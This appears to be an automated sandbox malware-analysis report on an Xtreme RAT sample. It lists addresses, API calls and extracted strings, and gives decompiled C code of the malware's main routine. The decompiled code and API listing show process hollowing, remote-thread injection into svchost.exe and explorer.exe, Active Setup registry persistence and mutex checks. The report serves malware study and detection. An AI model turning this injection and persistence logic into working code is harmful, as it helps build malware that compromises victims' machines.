0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
Part of subcall function 00C83B10: 775C13F0.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(0000017C,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00320000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00320000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000,00000000,00320000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000,00000000,00320000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00320000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
.xtr, xrefs: 00C8A3C2
Mutex, xrefs: 00C8A489
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C8A3A6
SOFTWARE\, xrefs: 00C8A472
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
C:\Windows\InstallDir\, xrefs: 00C8A156
XTREME, xrefs: 00C8A42F
%DEFAULTBROWSER%, xrefs: 00C8A208
explorer.exe, xrefs: 00C8A383
Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133
SOFTWARE\, xrefs: 00C8A0CD
DSma9HnKaPERSIST, xrefs: 00C8A16F
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
InstalledServer, xrefs: 00C8A0D9
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
svchost.exe, xrefs: 00C8A196
svchost.exe, xrefs: 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
local, xrefs: 00C8A3EF
DSma9HnKa, xrefs: 00C8A0C8

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8A0A2, Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 222
sleep

C-Code - Quality: 97%

			E00C8A0A2(void* __edx, void* __eflags) {
				short* _t14;
				short* _t16;
				short* _t19;
				short* _t25;
				short* _t35;
				intOrPtr _t51;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t63;
				void* _t65;
				void* _t67;
				long _t68;
				short* _t77;
				int* _t79;
				void* _t81;
				int* _t84;
				void* _t86;
				intOrPtr _t88;
				int* _t90;
				void* _t92;
				intOrPtr _t94;
				void* _t96;
				intOrPtr* _t103;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t139;
				void* _t140;
				void* _t141;
				intOrPtr _t143;
				intOrPtr _t146;
				intOrPtr _t150;
				intOrPtr _t161;
				void* _t167;
				signed int _t170;
				short* _t199;
				intOrPtr _t204;
				intOrPtr _t206;
				intOrPtr* _t210;
				intOrPtr _t214;
				intOrPtr* _t216;
				intOrPtr _t235;
				WCHAR* _t240;
				void* _t243;
				void* _t244;
				void* _t247;
				void* _t249;

				_t247 = __eflags;
				E00C814F0();
				_t14 =  *0xc8f898; // 0xc30000
				E00C83674(_t14);
				_t16 =  *0xc8f898; // 0xc30000
				E00C83674(E00C836D8(_t16, _t247));
				_t19 =  *0xc8f898; // 0xc30000
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t247), _t247, 2, _t19);
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t240 = 0xc8ec8a;
				_t25 =  *0xc8f898; // 0xc30000
				E00C82E48(_t25);
				_t199 =  *0xc8f898; // 0xc30000
				E00C82914(0xc914e8, _t199);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t247));
				E00C82914(0xc91b06, _t30);
				_t35 =  *0xc8f898; // 0xc30000
				_t170 = E00C836D8(_t35, _t247);
				E00C82E48(_t170);
				E00C82914(0xc916f2, _t170);
				if( *0xc8f38a == 1) {
					_t240 = E00C8263C(0, 0, "DSma9HnKaPERSIST");
					_t249 = GetLastError() - 0xb7;
					if(_t249 == 0) {
						CloseHandle(_t240);
					} else {
						CloseHandle(_t240);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t249);
						E00C8291C();
						_t161 =  *0xc8f89c; // 0x19a0000
						E00C82E48(_t161);
						_t235 =  *0xc8f89c; // 0x19a0000
						E00C82914(0xc8fac0, _t235);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
						_t167 =  *0xc8f8ac; // 0x17c
						E00C83CE4(_t167, 0xc8fccc,  &M00C88EF8);
					}
				}
				E00C81CD8(_t244 - 0x1838, 0x11, 0xc8f2b2);
				_t204 =  *0xc8b0dc; // 0x2ad9cc
				E00C81DBC( *((intOrPtr*)(_t244 - 0x1838)), _t204);
				if(_t249 != 0) {
					E00C81CD8(_t244 - 0x183c, 0x11, 0xc8f2b2);
					_t206 =  *0xc8b0d8; // 0x2a7934
					E00C81DBC( *((intOrPtr*)(_t244 - 0x183c)), _t206);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						_t51 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t51, 0xc91f1c, _t244);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t139 =  *0xc8f89c; // 0x19a0000
							_t140 = E00C83A54(_t139, 0xc8f8ac);
							__eflags = _t140;
							if(_t140 != 0) {
								_t141 =  *0xc8f8ac; // 0x17c
								 *0xc8f89c = E00C83B10(_t141);
							} else {
								 *0xc8f89c = E00C83094();
							}
							_t143 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t143, 0xc91f1c, _t244);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								_t146 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t146, 0xc91f1c, _t244);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						_t150 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t150, 0xc91f1c, _t244);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t243 = 0;
				 *0xc8f8a8 = 0;
				_t250 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t170 =  *0xc8f898; // 0xc30000
					_t240 = E00C833A8(E00C83420(0, _t170, 0), 0xc8a704, _t250);
					if(E00C83960(_t170, E00C82E48(_t170), _t240) == 0) {
						SetFileAttributesW(_t240, 0x80);
						_t252 = E00C82E48(_t240) + _t132;
						E00C82914(0xc91d10, _t240);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t240) + _t132), 0xc91f1c, _t244), 0xc91d10, E00C897F4);
					}
				}
				_t56 = E00C833A8(E00C836D8(0xc918fc, _t252), 0xc90fdc, _t252);
				_t210 =  *0xc8b0f0; // 0xc8e01c
				 *_t210 = _t56;
				_t57 =  *0xc8b0f0; // 0xc8e01c
				_t59 = E00C833A8( *_t57, L".xtr", _t252);
				_t212 =  *0xc8b0f0; // 0xc8e01c
				 *_t212 = _t59;
				_t60 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t60) != 0 && E00C87B84(L"local", _t170, _t243) == 1) {
					_t255 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, "svchost.exe", 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t244);
					}
					_t216 =  *0xc8b0e4; // 0xc8e024
					_t103 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t103, _t170, L"XTREME",  *_t216 - 0x1e, _t240, _t243, _t255);
					E00C82E14(_t244 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t244 - 0x1840,  *((intOrPtr*)(_t244 - 0x1844)), L"SOFTWARE\\", _t255);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t244 - 0x1840))), _t255, 2, "DSma9HnKa");
					_t115 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t115);
					_t117 =  *0xc8b0e8; // 0xc8e020
					_t212 = 0;
					E00C84600( *_t117, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t257 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					_t63 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t63);
					while(1) {
						_t213 = E00C88BC0;
						_t65 =  *0xc8f8ac; // 0x17c
						 *0xc8f8a8 = E00C83CE4(_t65, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4);
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t90 =  *0xc8b0e0; // 0xc8b000
							_t92 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t92,  *_t90);
							_t213 = 0xc91f1c;
							_t94 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t94, 0xc91f1c, _t244);
						}
						_t243 = _t243 + 1;
						_t67 = E00C8263C(0, 0, "DSma9HnKa");
						_t241 = _t67;
						_t68 = GetLastError();
						__eflags = _t68 - 0xb7;
						_t170 = _t170 & 0xffffff00 | _t68 == 0x000000b7;
						CloseHandle(_t67);
						__eflags = _t170;
						if(_t170 == 0) {
							_t84 =  *0xc8b0e0; // 0xc8b000
							_t86 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t86,  *_t84);
							_t213 = 0xc91f1c;
							_t88 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t88, 0xc91f1c, _t244);
						}
						__eflags = _t243 - 7;
						if(_t243 >= 7) {
							break;
						}
						__eflags = _t170 - 1;
						if(_t170 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t170, _t213, _t241, _t243);
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t79 =  *0xc8b0e0; // 0xc8b000
						_t81 =  *0xc8f8ac; // 0x17c
						TerminateProcess(_t81,  *_t79);
						E00C88BC0(_t170, _t241, _t243, __eflags, 0xc8fccc);
					}
					__eflags = _t243 - 7;
					if(_t243 >= 7) {
						__eflags = _t170;
						if(_t170 == 0) {
							_t77 =  *0xc8f898; // 0xc30000
							ShellExecuteW(0, L"open", _t77, 0, 0, 0);
						}
					}
					goto L38;
				} else {
					_t96 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t96);
					E00C840F8(0xc8e07c, _t170, _t212, _t240, _t243);
					E00C88BC0(_t170, _t240, _t243, _t257, 0xc8fccc);
					L38:
					_pop(_t214);
					 *[fs:eax] = _t214;
					_push(0xc8a632);
					E00C81B90(_t244 - 0x1844, 5);
					return E00C81B78(_t244 - 0x14);
				}
			}

0x00c8a0a2
0x00c8a0a2
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
